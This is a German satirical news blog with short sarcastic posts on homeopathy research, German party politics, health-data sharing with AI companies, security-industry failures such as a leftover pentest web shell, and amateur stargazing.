Fragen? Antworten! Siehe auch: Alternativlos
Nene, Fefe, pass uff, PHP ist gar nicht mehr so Scheiße wie früher! Ist voll besser geworden!1!!
Und Wordpress ist auch gar nicht mehr so krass kacke wie früher!1!!
Und alle so: NEIN!!! DOCH!! OOOOH!
New hotness: New Zealand navy ship sank off Samoa because autopilot was left on.
Einmal mit Profis arbeiten!
Wer baut eigentlich Autopiloten, die das Schiff in ein Riff fahren?
Klingt nach 0815-Ransomwarebefall. Hey wieso würde man da als Krankenhaus auch im Vorfeld was gegen tun, geht ja nur um Menschenleben und privateste Gesundheitsdaten.
Wo sind die denn, wenn man sie braucht?
Hier versucht jemand mit Falschbehauptungen die Wahlen zu manipulieren!!1!
„Wir haben heftig diskutiert nach dem Motto, dass man nicht nichts mit nichts vergleichen kann. Wir sind uns alle einig, dass Homöopathie unwirksam ist.“Ja, äh, wieso habt ihr den Scheiß dann überhaupt mitgemacht?!
Auch das Studienprotokoll ist eher peinlich.
Aus diesem geht hervor, dass die eingangs genannten Globuli zur Verfügung standen, insgesamt 140 „verschiedene“ Mittel. „Homöopathie hat nachweisbar bei anderen Infektionskrankheiten zu einer Reduktion akuter Infektionen geführt“, heißt es unter Verweis auf einzelne Studien, die teils von der Pharmafirma Deutsche Homöopathie-Union finanziert worden waren.LOL! Union klingt jetzt irgendwie non-profit oder so. Lasst euch davon nicht verarschen. Das ist ein kommerzieller Hersteller. Mit anderen Worten: Die Täter. Der Täter sagt, sein Wasser sei aber doch wirksam. Sonst sagt das keiner. Überraschung!
In diesem ist außerdem von „Erstverschlimmerungen“ die Rede, die bei Mitteln der Homöopathie angeblich auftreten könnten, und dass laut deren Theorie die Präparate die „psycho-neuro-immunologischen Funktionen im menschlichen Körper“ regulieren könnten. Immerhin: Überdosierungen homöopathischer Mittel seien „unwahrscheinlich“.Kannste dir nicht ausdenken. Die Erstverschlimmerung ist ja mein Lieblingskonzept aus der Homöopathie. Das ist der Zustand, wenn du das Wasser getrunken hast, und es natürlich nicht wirkt, und die Krankheit schlimmer wird. Bis dein Immunsystem es von alleine schafft.
Merkt die TU München nicht, dass hier ein paar windige Geschäftemacher versuchen, ihren guten Namen zu missbrauchen?!
Der ganze Artikel ist ein einziger Bauchlacher. Hier ist noch ein schöner Absatz:
Auf Nachfrage verteidigte das BfArM, die Studie zugelassen zu haben – obwohl es ein Ausschlussgrund für die Genehmigung von Studien ist, wenn die Unterlagen dem Stand der Wissenschaft nicht entsprechen. Laut Arzneimittelgesetz mussten zur Beantragung der Genehmigung außerdem Ergebnisse analytischer und pharmakologisch-toxikologischer Prüfungen vorgelegt werden. Darauf hat die Behörde auch aufgrund der Verdünnung verzichtet.Ach. Ist so verdünnt, dass es nicht (negativ) wirken kann? Daher gucken wir mal, ob es positiv wirken kann? Was für Schulabbrecher sitzen denn da in dieser Aufsichtsbehörde?! Lauter abgehalfterte CSU-Rentner oder was?
Ja aber Fefe, fragt ihr euch jetzt vielleicht, wieso haben die denn die Studie überhaupt abgebrochen? Oh, ganz einfach! Weil sie keine Freiwilligen gefunden haben, die blöde genug waren.
„Für mich ist fast schon beruhigend, dass nicht so viele mitmachen bei dem Schmarrn“, sagt die SPD-Gesundheitspolitikerin Waldmann auf Nachfrage zum Studienabbruch. Dessen Grund, die mangelnde Teilnahmebereitschaft trotz Werbung etwa im Münchener Nahverkehr, sei für die bayerische Staatsregierung, die Grünen und die AfD, die auch für die Studie gestimmt habe, „sensationell peinlich“.Hahaha, natürlich! Die Grünen und die AfD! Das war ja klar. Von den Leuten, die auch an Germanische Neue Medizin glauben.
Aber wartet, ein wunderbarer Schlusssatz kommt noch:
„Es gibt keinen Mangel bei Forschungsergebnissen zur Homöopathie – es gibt nur einen Mangel bei der Bereitschaft, sie zur Kenntnis zu nehmen.“*wieher* (Danke, Marcus)
Teil des Festes ist ein Umzug, bei dem Frauen gefangen und von kostümierten Männern, den Klaasohms, mit Kuhhörnern geschlagen werden.Wait, what?!
Aber keine Sorge. Konfrontiert mit einem Aufschrei in sozialen Medien haben die Veranstalter spontan entdeckt, dass sie das schon immer schlecht fanden und nicht mehr tun wollen.
Der Verein habe sich entschieden, den Brauch des Schlagens vollständig abzuschaffen, heißt es darin. Der Verein lehne "jegliche Ausübung von Gewalt, insbesondere gegenüber Frauen" ab. "Wir distanzieren uns ausdrücklich von jeder Form der Gewalt gegen Frauen und entschuldigen uns in aller Form für die historisch gewachsenen Handlungen der vergangenen Jahre, insbesondere für die Gewaltausübung der jüngeren Vergangenheit."Bisschen dick aufgetragen gegen Ende. Wenn der Verein tatsächlich "jegliche Ausübung von Gewalt, insbesondere gegen Frauen" ablehnen würde, hätte es keinen Aufschrei gebraucht, um das nicht mehr zu machen. (Danke, Bartosz)
Der Bericht der Bundespolizei ist offenbar eindeutig: Brasiliens Ex-Präsident Bolsonaro soll aktiv mitgewirkt haben an einem Putschversuch gegen seinen Amtsnachfolger Lula. Sogar dessen Ermordung soll geplant worden sein.Und damit bestätigt sich mal wieder das schöne alte Spruch: Was du selbst denkst und tust, das traust du auch den Andern zu.
Klar hatte der Angst vor einer Hinrichtung durch Lula!
Das Bild lege ich mir auf Wiedervorlage, sage ich euch. Da werde ich wochenlang gute Laune von haben.
FDP will deutsches Lieferkettengesetz stoppenKlar, drei Jahre früher wäre noch besser gewesen.
Wer hätte gedacht, dass jemand, der bei seiner Doktorarbeit betrügt auch als FDP-Generalsekretär ungeeignet sein würde!1!!
Nicht nur der Generalsekretär wirft hin, auch der Bundesgeschäftsführer Carsten Reymann. (Danke, Jochen)
Die, die sich ein DOGE-Ministerium für die EU wünschen. Neue Ministerien für mehr Effizienz, wissenschon. Klassische FDP-Kernidee!
(Eigentlich reicht ja schon, dass die noch auf Twitter unterwegs sind)
Wo kommt eigentlich diese Idee her, dass Cloud-Anbieter schon kompetent sein werden? Oder dass etablierte Softwarehersteller schon wissen werden, was sie tun?
Nee, Leute, solange der Markt (IHR!!!) solche Leute nicht abstraft, überleben auch maximal inkompetente Pfuscher auf unbestimmte Zeit.
Hey ein Glück, dass dieser Klimawandel bloß ein liberal hoax der Chinesen ist!1!! Sonst müsste man langsam anfangen, sich Sorgen zu machen.
Ich hatte vor ein paar Tagen die Gelegenheit, jemanden der mit seiner Firma Confidential Computing im KI-Kontext entwickelt, weltweit vertreibt und auch bereits einsetzt, zu fragen : habts ihr da neue Angriffsvektoren entdeckt, wie macht ihr Security-Analysen, etc.Nee, das ist genau meine Erwartungshaltung. Diese ganze Security-Branche ist so. Probleme werden kleingeredet ("kann man eh nichts machen", "wir sind da von Microsoft abhängig", "100% geht eh nicht"), Angreifer werden großgeredet ("APT", "enorme kriminelle Energie"), Chancen werden herbeihalluziniert ("damit können Sie Angreifer entdecken!!1!", "damit können Sie Geld sparen!1!!") und nie tatsächlich geliefert, und dann kokst sich der Händler eine neue Luxusjacht zusammen und macht keinen Support außer man zahlt nochmal in Nasenblut für einen fetten Supportvertrag. Wenn die Security-Probleme im angeblichen Security-Produkt zu krass werden, drückt man den Kunden Bullshittheater wie MFA auf, von dem man weiß, dass das eh keiner umsetzt, und behauptet einfach, das Opfer war Schuld.Antwort:
- wir verlassen uns auf die anderen (Netzwerksicherheit,..)
- „.. bei machine learning ging es tatsächlich nie um Sicherheit, hmm..“
Das wars.
Schon geil für eine bleeding edge Confidential Computing Company.
Das klingt jetzt alles wie der irre Rant von irgendeinem Alkoholiker, insofern glaubt nicht mir, glaubt Kevin Beaumont. Er hat völlig Recht. So sieht das da draußen aus in der Praxis.
Sehr geil auch an der Stelle dieser Artikel von 2017 über einen Vortrag eines GCHQ-Schlipsträgers, der den Scheiß auch nicht mehr aushält. Der erzählt im Wesentlichen dasselbe wie ich da oben und hängt dann dieses Money Quote an:
He pointed out that a UK telco had recently been taken offline using a SQL injection flaw that was older than the hacker alleged to have used it. That’s not advanced by any stretch of the imagination, he said.
HARR HARR HARRGenau so sieht es aus. Niemand wird über komplizierte 0days gepwnt. Wieso würde sich der Angreifer so einen Aufwand machen, wenn er auch über hartkodierte Passwörter für Admin-Backdoor-Accounts reinkommen (winke winke, Cisco).
Dass jetzt also ausgerechnet in der Cloud die heilige Mutter Gottes in Sachen Security ausbricht, wo man als neugieriger Kunde es am wenigstens sehen oder messen kann, das war schon immer offensichtlicher Bullshit. Schade, dass das nie jemanden abhält.
Hey wisst ihr was? Wenn ihr Geld zu verbrennen habt, gebt es doch einfach mir!1!!
So sehr ich mich freue, wenn ausgerechnet die Korruptions- und Hotelierspartei plötzlich einen auf Transparenz macht: Da hätten sie vielleicht lieber einen Moment wählen sollen, wo sie weniger offensichtlich die Bösen sind.
Phase IV: Beginn der offenen FeldschlachtSehr geil auch:
Start Mitgliederkampagne „Partei ergreifen“Die haben ernsthaft gedacht, Verrat an den Wählern würde ihnen auch noch einen Zulauf aus neuen Wählern einbringen. Klar, für verraten werden stehen die Leute Schlange!
Lauterbach zu Gesundheitsdaten: Google, Meta, und OpenAI melden Interesse an
Oh, äh, warte, das waren ja genau die, von denen wir NICHT wollten, dass sie unsere Daten kriegen. Hups, das ist jetzt aber schon ein bisschen peinlich gerade.
Merkt auch der Lauterbach, oder? Nee. Der ist nach wie vor völlig verstrahlt:
"Zum Beispiel ist der Datensatz jetzt so aufgebaut, dass in dem Forschungsumfeld des Forschungsdatenzentrums 'confidential Computing' möglich ist, weil die Daten in diesem Umfeld [...] nicht mehr verschlüsselt sind", erklärt Lauterbach.Das ist natürlich völliger Bullshit. Wenn die Daten nicht verschlüsselt sind, dann ist das nicht confidential. Das wird auch nicht weniger Bullshit, wenn du da zweimal explizit "Forschung" drüberstreuselst.
In den nächsten Sätzen wird klar, was der Lauterbach konkret falsch verstanden hat.
Damit sollen Forscher nach erfolgreichem Antrag Zugriff auf die Daten erhalten, wobei der Forschungszweck entscheidend ist und nicht, wer den Forschungsantrag stellt. Dabei ist es Lauterbach zufolge so, "dass der Datensatz nie dieses sichere Umfeld verlässt". Forschern sei es möglich, den Datensatz auch mit KI zu nutzen, aber die Daten würden die vertrauenswürdige Ausführungsumgebung nicht verlassen.Ja klar, nee, nur die trainierte "KI" verlässt dann die "vertrauenswürdige" (wohlgemerkt: nicht die sichere!) "Ausführungsumgebung".
Lass es mich mal so sagen: Die sicherste Ausführungsumgebung wäre ein schwarzes Loch. Du schickst deinen Agenten (und nach genau diesem Hirnwichs klingt das gerade für mich) hinter den Schwarzschildt-Radius und der forscht dann da und kann dir nie die Ergebnisse seiner Forschung sagen. Das ist natürlich komplett nutzlos, daher versuchen sie hier eine Nebelwand aufzubauen, wo sie dir Forschung und Sicher und Vertrauenswürdig in die Augen sprühen, damit du nicht merkst, dass natürlich die Daten alle abfließen werden, in Form der Ergebnisse der "Forschung".
An dieser Stelle vielleicht nochmal hilfreich: Man kann Trainingsdaten aus einer "KI" extrahieren. Das hat vielleicht noch nie jeder hier auf dem Schirm.
Falls ihr euch jetzt dachtet: Hey, so blöde ist der Lauterbach nicht, dass der nicht merkt, dass niemand in der Bevölkerung möchte, dass Google und Meta und OpenAI Zugriff auf die Gesundheitsdaten kriegen. Dann muss ich euch enttäuschen. Lauterbach hat denen nicht etwa ins Gesicht gelacht oder sie einfach direkt wegignoriert. Nein, nein!
"Daher interessieren sich auch die Hersteller aller großen KI-Systeme für diesen Datensatz. Wir sind im Gespräch mit Meta, mit OpenAI, mit Google, alle sind daran interessiert, ihre Sprachmodelle für diesen Datensatz zu nutzen, beziehungsweise an diesem Datensatz zu arbeiten", so Lauterbach.Hey, Lauterbach, weißt du, woran es noch gewaltiges Interesse gibt? An deinem Vermögen! Wenn das dein Optimierungskritierum ist, wieviel Interesse es gibt, dann verteil doch mal dein Geld unter den Interessierten!
Bei einer Veranstaltung der Wärmepumpen-Branche bekräftigt Unions-Fraktionsvize Jens Spahn, dass seine Partei das Heizgesetz zurücknehmen und die Heizungsförderung stark reduzieren will. Statt allein auf Wärmepumpen zu setzen, plädiert er für „grünes Öl“. In der Branche sorgt das für erhebliche Verunsicherung.So viel Fnord in so wenig Text! Sehr geil auch: Grünes Öl? I don't even…
Der ganze Artikel ist ein Feuerwerk der Dämlichkeit. Und diesmal liegt es nur teilweise am "Focus". Nicht vergessen: Die CDU hat den Spahn nach seinem vollständigen Totalversagen nicht etwa rausgeworfen sondern der ist da jetzt Fraktionsvize. SPAHN!!! Falls ihr euch nicht erinnert, für welches Intelligenzniveau der steht, hier noch ein Money Quote aus dem Artikel:
Spahn erklärte dagegen, er gehe davon aus, ohne das „Habeck'sche Gesetz“ würden in Zukunft sogar mehr Wärmepumpen eingebaut als mit. Als Beleg führte er an, dass die Absatzzahlen in diesem Jahr wegen der fehlenden Akzeptanz eingebrochen sind.Wer diese Worte raushaut, ohne davon Kopfweh zu kriegen, der handelt entweder vorsätzlich (keep them stupid, poor and angry) oder ... vielleicht sollte sich der Spahn mal auf einen RFK-Style Hirnwurm untersuchen lassen? (Danke, Martin)
Luzerner scheinen eh nicht so die hellsten Birnen im Lampenladen zu sein, die haben da auch Blockchain-"Professoren" an der "Uni".
Dasselbe gilt selbstredend auch für andere Hintertüren, beispielsweise in Ampeln und jetzt aktuell: In Autos.
Strafverfolgern gelingt es immer seltener, Gespräche potenzieller Straftäter heimlich in Autos abzuhören. Grund ist die moderne Diebstahlsicherung vieler Autos. Baden-Württemberg will daher die Automobilhersteller in die Pflicht nehmen.Wenn die Polizei die Alarmanlage von außen ausschalten kann, können es auch Autodiebe.
New hotness: OLG Hamburg fällt ein krasses Fehlurteil nach dem nächsten. Aktuell:
OLG Hamburg: Uberspace haftet wegen Hosting von Youtube-DL
Man würde ja denken, wenn da doch ein Fahrer drin sitzt, könnte man auch Passagiere mitnehmen. Außer das Passagierabteil ist mit "KI"-Hardware vollgestellt.
Ein einziges Erfolgsmodell, diese "KI"!
Haushaltslücke? Welche Haushaltslücke!
Zugleich aber ist mit dem Platzen der Koalition auch das sogenannte Rentenpaket II der Ampel geplatzt. Es sah unter anderem den Aufbau eines Kapitalstocks vor, der am Aktien- und Anleihemarkt angelegt wird und dessen Erträge als zusätzliche Altersvorsorgesäule die gesetzliche und die betriebliche Rente hätten ergänzen sollen. Lindner wollte für dieses sogenannte Generationenkapital im ersten Schritt zwölf Milliarden Euro an Darlehen aufnehmen.Ach. Ach was. Ohne den Lindner müssen wir den Lindner-Kapitalmarktzockern gar keine Kohle in den Arsch blasen? Und damit ist unser Haushalt plötzlich saniert?! NA SOWAS!
Thyssenkrupp beauftragte zu Projektbeginn die Unternehmensberatung McKinsey mit einer Machbarkeitsstudie, innerhalb welcher die Gesamtkosten für den Werksbau mit 1,9 Milliarden Euro kalkuliert wurden. Die Bramme Stahl sollte dieser Studie nach um 55 US-Dollar pro Tonne kostengünstiger als in Deutschland produziert werden. Nach Presseberichten hat Thyssenkrupp Stand 2013 etwa acht Milliarden Euro in das Vorhaben investiert. Die in dem Werk gefertigte Bramme Stahl ist um 170 US-Dollar teurer als eine aus deutscher Produktion.Ach. Ach was. Die haben auf McKinsey gehört? Und das ist ihnen voll in den Fingern explodiert? NA SOWAS!
Das Werk in Brasilien wurde 2013 zum Verkauf angeboten und Anfang 2017 für 1,5 Milliarden Euro von dem argentinischen Stahlkonzern Ternium übernommenZum Vergleich: Heute ist Thyssenkrupp (Marktkapitalisierung) 2,47 Milliarden Euro wert.
Begründung: Israel ist nicht Mitglied des Gerichtshofs. Haftbefehle gelten nur gegen Mitglieder.
Siehe auch Israels offizielle Erklärung. Die finden schlicht, der Internationale Strafgerichtshof habe gar keine Zuständigkeit.
Frankreich führt dann noch aus, dass Frankreich eine historische Freundschaft mit Israel verbinde und man als Demokratien gegenseitig die unabhängige Gerichtsbarkeit des jeweils anderen respektieren werde, und auch in Zukunft mit Netanjahu für den Frieden im Nahen Osten zusammenarbeiten werde.
Die cloudbasierte Protokollverwaltung von Cloudflare hat für etwa dreieinhalb Stunden keine Daten an Kunden übermittelt. Etwa 55 Prozent der Logs gingen dabei verloren.Hattet ihr sowas schon mal on-prem? Kennt ihr jemanden, der sowas schonmal on-prem hatte?
Eine Sicherheitslücke ermöglicht Angreifern, Schadcode einzuschleusen und mit erhöhten Rechten auf verwundbaren Rechnern zu installieren.Und zwar über *trommelwirbel* den Update-Mechanismus.
Der Beispielcode für den Bug ist ganz witzig, fand ich. Könnte man auch wegignorieren, wenn die Warnung von -fanalyzer nicht so aussähe:
x.c: In function ‘open_for_reading_long’: x.c:15:6: warning: leak of file descriptor [CWE-775] [-Wanalyzer-fd-leak] 15 | if (fd != -1) { // gcc -fanalyze false positive | ^ ‘open_for_reading_long’: events 1-2 | | 14 | long fd=open(filename,O_RDONLY); | | ^~~~~~~~~~~~~~~~~~~~~~~ | | | | | (1) opened here | 15 | if (fd != -1) { // gcc -fanalyze false positive | | ~ | | | | | (2) leaks here; was opened at (1) |Wenn die direkt mit CWE um sich werfen, dann tritt das bestimmt irgendwelche Compliancetheaterspiralen los, und dann sollte man das nicht belächeln sondern muss einen Bug filen finde ich.
Dagegen hatte nicht etwa der Dienst selber geklagt sondern andere Crypto Scammer wie Coinbase, die negative Auswirkungen auf ihre "Branche" befürchtet haben.
Ich erwähne das nicht wegen dem Crypto-Scamming-Teil sondern wegen diesem Teil hier:
Zwar seien die Befürchtungen "unzweifelhaft legitim", dass über den Dienst verbotene Geldwäsche stattfinden könne, erkennt das Gericht darin an. Aber eine Software könne unter den gesetzlichen Vorgaben nicht sanktioniert werden, "anders als die böswilligen Personen und Einrichtungen, die sie missbrauchen".Das öffnet das Tor zur Hölle, weil jetzt jeder stinkende Scheißdienst überhaupt keine Rücksicht mehr auf Menschenleben nehmen wird. Das war eine "KI", kein Mensch, und Software kann nicht sanktioniert werden!1!!
Scheiße, Bernd, das ging ja doch schneller als ich befürchtet hatte.
Dieses konkrete Bild ist von 2010 aber ich glaube das ist eigentlich noch älter. Das wird schon ewig herumgereicht.
Jedenfalls: Hey, ist egal, nimmst du halt nicht ins Handgepäck sondern packst du ins eingecheckte Gepäck. Und so bekloppt werden die ja wohl heute nicht mehr sein, oder? ODER?
Heute so, nachdem sie die Details gesehen haben: Oh nööö, lass mal stecken.
Nein, habt ihr nicht. Accounts auf "X" gehören nämlich nicht euch sondern Elon Musk, haben sie gerade vor Gericht argumentiert, um die Accounts von Alex Jones nicht rauszurücken zu müssen, wie das Gericht angeordnet hatte.
Update: Einige Leser merken völlig zu Recht an, dass wenn der Account X gehört, dass dann auch X haften sollte gegenüber den Sandy Hook-Eltern.
New hotness: Elon Musk macht die Ionosphäre kaputt.
Kein Wunder, dass der so dringend zum Mars will. (Danke, Alex)
Copilot security issue that inadvertently let employees access sensitive information such as CEO emails and HR documents
Das passiert, wenn du Wissen abbaust und stattdessen an "KI" outsourced.Microsoft verkauft den Dreck erst als "dann brauchst du keine teuren Fachkräfte mehr" und faselt jetzt was von "das hätten eure teuren Fachkräfte aber verhindern müssen!1!!"
Bei denen willst du doch einkaufen gehen!1!!
Update: Das ist nicht das einzige Copilot-Rechteauswertung-Problem diese Woche.
Diese Softwaregattung hatte früher eine gewisse Berechtigung und ist mittlerweile selbst zur Gefahr auf privaten Rechnern geworden. […] Antivirensoftware von Dritten verursacht mit ihrer Systemarchitektur wie auch mit fortwährenden Qualitätsproblemen selbst neue Sicherheitsprobleme. […] Die schlimmste Gefahr für einen Rechner besteht jedoch nicht darin, dass die Wächter einen Schädling übersehen, sondern sie selbst die Tore weit öffnen.Hat ja auch lange genug gedauert.
Ja geil, ey. Genau das Fass, dass wir gerade dringend geöffnet brauchten!1!!
Warum? Weil die KI Radfahrer und Fußgänger bevorzugt hat. Ja das ist doch aber gut? Schon, nur:
Die Stadt Hamm vermutet, dass das mit mehreren innerstädtischen Baustellen und Ausweichverkehr zu tun hat. Teilweise sorgt das für bis zu 500 Meter Stau und mehrere Minuten Wartezeit für die Autofahrer. Deswegen haben sich viele bei der Stadt Hamm beschwert.Vielleicht hätte Hamm ihr Geld in das Baustellenmanagement stecken sollen statt in "KI"-Bullshit. (Danke, Christoph)
Lösungswikis ohne Adblocker wird wahrscheinlich niemand freiwillig klicken, außer wenn der versiffte Edge im Spiele-Overlay keinen Adblocker hat. Insofern wird das den Umsatz von Lösungswikis hochtreiben fürchte ich.
Wenn es nach mir ginge, haben werbefinanzierte Lösungswikis den Untergang verdient, nicht mehr Umsatz.
New hotness: Chinesische Firma schaltet in den USA Equipment und Infrastruktur ab, scheißt auf die unschuldigen Konsumenten, bei denen das im Keller stand.
Es handelt sich um Solarinverter und die chinesische Firma heißt Deye.
Ich persönlich empfinde da erstmal Schadenfreude. Höchste Zeit, dass auch mal US-Konsumenten Opfer spüren, wie das ist, wenn man Opfer von Sanktionen Dritter gegen Vierte wird. (Danke, Harald)
Update: Da bin ich offenbar nicht der einzige, der 11000 Stellen im Stahlwerk für bemerkenswert viel hält. Hier gibt es eine passende Schlagzeile:
Großes deutsches Stahlwerk schließt: Hunderte Mitarbeiter könnten Jobs verlieren
Ja, hunderte hätte ich auch grob geschätzt. Und das ist ein "großes" Stahlwerk hier.
Betroffen sind rund 220 Mitarbeiter.
Das klingt plausibler als 11000 Männer im Stahlwerk. Aber wer weiß, vielleicht schließt Thyssen da das größte Stahlwerk der Weltgeschichte. Oder ... das ineffizienteste?
Update: Vielleicht hätte ich doch ein bisschen Logging einbauen sollen, anstatt den Datenschutzfundamentalisten zu geben.
Ich hab ja lange Jahre der Entzaubern-Theorie angehangen. Wenn die Faschisten erstmal im Amt sind und sich als korrupte Nichtskönner entpuppen, dann sind die auch ganz schnell wieder weg. Das funktionierte in Holland, in Österreich eher gar nicht.
Stellt sich raus: Das Versagen und das enttäuschte Vertrauen der "Volksparteien" ist so groß, dass die Leute lieber die korrupten Nichtskönner-Faschisten wählen, als sich weiter von den "Volksparteien" verarschen zu lassen.
Ich persönlich fände ja prima, wenn der Habeck einen Wissing pullt und die Grünen verlässt. Ich mag die nicht, aber am Ende werden wir ja einen Kanzler brauchen, hilft ja alles nichts.
New hotness: Aufzugersatzverkehr bei der BVG. Ist ein Kleinbus.
Auf der einen Seite: Cooles Projekt. Auf der anderen Seite schon ziemlich schockierend, dass es einfacher für die BVG ist, einen Busservice anzubieten, als die fucking Aufzüge in Betrieb zu halten. (Danke, Timo)
Welch Elend! Lange spürte ich nicht mehr so viel Mitgefühl! Sobald ich zeit habe, werde ich eine Trauerminute einlegen!1!!
Da hat ja ne Weile dieser Rodrigo Duterte mit der Kettensäge regiert, jetzt ist seine Tochter Sara Vizepräsidentin und hat folgendes zu Protokoll gegeben:
Duterte told an early morning press conference that she had spoken to an assassin and instructed him to kill Marcos, his wife and the speaker of the Philippine House if she were to be killed.
Nukleare Abschreckung geht auch ohne Atomwaffen!
Rund 56 Prozent des Erlöses pro verkauftes Produkt bei Amazon gehen an Amazon.Heilige Scheiße!
Die eine Hälfte der Reaktionen erklärt mir jetzt, dass ich da wahrscheinlich Sensorrauschen gefilmt habe, und da mal mit ordentlichem Equipment hingehen soll.
Die andere Hälfte hat irgendein Fotobearbeitungsprogramm angeworfen und am Gamma geschraubt und einige haben auch noch die JPEG-Artefakte weggefummelt, und da kamen dann ganz ansehnliche Aufnahmen bei raus.
Es ehrt mich, dass ihr mir alle helfen wollt, aber ich wollte eigentlich bloß sagen, dass ich da nochmal hinfahre, und zwar wenn Neumond ist. Mein Ziel hier ist nicht, mit geilen Fotos heimzukommen. Mein Ziel ist, Sterne zu sehen. Und das ist mir ja schon beim ersten Mal gelungen. Ist also jetzt schon ein Erfolg, die Außenmission.
Wenn ich den einen oder anderen von euch inspirieren konnte, auch mal ein paar Sterne zu gucken, dann freut mich das sehr. Das war der Grund, wieso ich das überhaupt ins Blog getan habe.
Das mit der Lichtverschmutzung ist jetzt schon ein Riesenproblem und wenn Elon noch seine ganzen Satelliten ins Low Earth Orbit furzt, könnten sich das Fenster rapide schließen, in dem man noch schöne Beobachtungen machen kann. Das sollten wir also alle nutzen, solange es noch offen ist.
Sie haben die Webshell benutzt, die die Pentester wieder rückzubauen vergessen hatten.
Within this assessment, the red team (also referred to as ‘the team’) gained initial access through a web shell left from a third party’s previous security assessment.
Warte mal, das merkst du doch, wenn nach einem Pentest Änderungen in der Infrastruktur sind? Mindestens wenn du kritische Infrastruktur bist und alles in fünffacher Ausfertigung dokumentiert haben musst!1!!The Cybersecurity and Infrastructure Security Agency (CISA) conducted a red team assessment (RTA) at the request of a critical infrastructure organization.
Hey, das ist ja fast so, als würde dieses ganze Checklistenbalett überhaupt nichts bringen und sei reine Zeitverschwendung!1!! (Danke, Kris)
New hotness: Brückenersatzverkehr mit der Fähre.
Es war wegen, äh, also das war Wahlkampf der SPD. Denn die SPD arbeite an der „Zerstörung der FDP“. Und im Übrigen sei das für die SPD schlecht, wenn die FDP stark ist.
Mit einer Sache hat das jedenfalls NICHTS zu tun: Mit seiner, äh, nennen wir es Arbeit.
Ich fände ja geil, wenn Rezo jetzt Lindner abmahnt. Wenn hier einer zerstört, dann icke!!1!
Wegner und die CDU, wir erinnern uns, waren die, die von Anfang an die Mietpreisbremse (eine Idee der Linken) Scheiße fanden und nach Kräften blockiert und sabotiert haben.
Entsprechend irritiert reagiert die Bundes-CDU. Hey Kai, *checks notes* wir waren die, die immer gegen die Mietpreisbremse waren!1!!
Update: Warum gute Nachrichten? Na: Nur Nixon konnte nach China gehen! Nur die CDU kann die Mietpreisbremse durchsetzen.
Die Römer sind nicht so begeistert.
Die Effizienzsteigerung durch "KI"-PCs ist negativ.
Das ist natürlich ein Problem für Intel, die den Scheiß ja verkaufen wollen.
Intel bezeichnete das als eine "beunruhigende Statistik".Insofern brauchen sie jetzt einen Spin. Hier ist der Spin, auf den deren Marketingabteilung dazu gekommen ist:
Als möglichen Grund dafür sieht der Chiphersteller, dass zahlreiche KI-Nutzer noch viel Zeit damit zubrächten, herauszufinden, wie sie am besten mit KI-Chatbots kommunizieren, um auch die gewünschten Ergebnisse zu erzielen.Mit anderen Worten: Die Kunden sind zu blöde, um unsere genialen Zukunftstechnologie gewinnbringen einzusetzen!
Genau mein Humor! Besonders weil diese geniale Zukunftstechnologie den Leuten ja genau den Teil abnehmen sollte, darüber nachdenken zu müssen, wie man das richtig einsetzt.
Ich dachte mir aber, ich versuche mal mit der Handykamera Fotos zu machen. Ich habe dafür den Selbstauslöser genommen, die Belichtungszeit auf 5 Sekunden (mehr ging mit der mitgelieferten Schrotti-App nicht), und das Handy auf eine Oberfläche gelegt für das Foto.
Als ich mir dann die Fotos anguckte, waren die schwarz. Ich nahm an, die sind nichts geworden.
Hier ist eines. Wenn man da im Browser draufguckt, ist das einfach nur schwarz.
Aber zoomt das mal auf 300% oder so und scrollt ein bisschen herum. Plötzlich sieht man dann doch auch auf dem Foto Sterne, aber die sind halt jeweils nur einen Pixel groß :-)
War also doch nicht bloß Apophenie, die Sterne, die ich da zu sehen glaubte! Jetzt bin ich doch ganz zufrieden, dass ich die Fotos gemacht habe.
Letztes Mal war gerade Halbmond. Der hat geradezu geblendet, der Mond. Ich glaube ich fahr da nochmal bei Neumond hin.
Ich sollte mir echt mal einen Monitor mit guten Schwarzwerten anschaffen.
Warum?!?
Und wie üblich gibt es keinen FUCK OFF-Button sondern nur "Not right now". Frag mich morgen nochmal!1!!
»Konkret bedeutet dies, dass das derzeitige System nicht in der Lage ist, mittelfristig die Erfüllung der Pensionsverpflichtungen für künftige Generationen zu garantieren.«Da braucht man einen Experten. Einen Fachmann. Jemanden, der da mit harter Hand reformiert.
Der Papst ernannte Kardinal Kevin Farrell zum neuen Verwalter des Pensionsfonds. Der irisch-amerikanische Prälat leitet seit 2016 das vatikanische Büro für Familienfragen.In other news: Der Vatikan unterhält ein Büro für Familienfragen.
OK und was reformieren die da jetzt?
Medienberichten zufolge soll das Defizit im vergangenen Jahr bei mehr als 80 Millionen Euro gelegen haben.(Danke, Julia)Franziskus hatte deswegen bereits die Gehälter der Kardinäle um zehn Prozent gekürzt, einige Dienstaltersprämien ausgesetzt, die Sonderstipendien für die in Rom lebenden Kardinäle gestrichen und begonnen, für ihre Wohnungen marktübliche Mieten zu verlangen.
New hotness: Kriminelle sprengen Kontoauszugsdrucker.
Der Einsender vermutet Fachkräftemangel, ich glaube eher, dass die bei HP in die Preisliste für Tinte geguckt haben und ausgerechnet haben, dass für den selben Transportaufwand Druckertinte wertvoller als Papiergeld ist. (Danke, Martin)
Netanjahu lässt antworten:
Es gebe nichts Gerechteres, als den Krieg, den Israel im Gazastreifen führt. Die Haftbefehle seien "antisemitische Entscheidungen", getroffen von "voreingenommenen Richtern getrieben von antisemitischem Hass gegen Israel", heißt es in der Erklärung weiter.Antisemiten. Überall Antisemiten, sage ich euch.
Bugs gibt es nicht nur für Hard- oder Software, sondern auch in Wetware. Einer wurde gerade entdeckt, und könnte ein Durchbruch in der Krebstherapie sein.Sehr cool, finde ich!Money quote: "Gliocidin activity targets a de novo purine synthesis vulnerability in glioblastoma"
Es geht um eine vulnerability in der Purin-Synthese, die spezifisch für Glioblastome ist. Für diesen Tumor gibt es bis heute keine effektive Therapie. Der Exploit ist ein kleines Molekül (Gliocidin). "De novo" ist bio-speak for zero-day :-))
Auf der Metaebene ist es spannend zu sehen, wie "mechanistisch" Biologie geworden ist. Und wie damit computer science und liefe science auf gemeinsame Terminologie konvergieren.
Update: Mehrere Leser haben Einwände zu "de novo".
Dazu wollte ich anmerken, dass sich "de novo" in "de novo purine synthesis vulnerability" nicht auf die vulnerability bezieht, sondern auf die purine synthesis. "De novo" ist ein feststehender Terminus in der Biologie, der ausdrückt, dass hier ein Molekül neu synthetisiert wird und nicht etwa ein "altes" Purin recycled wird.
This is why we can't have nice things! (Danke, Manuel)
Hier ist der seriösere der offenen Briefe.
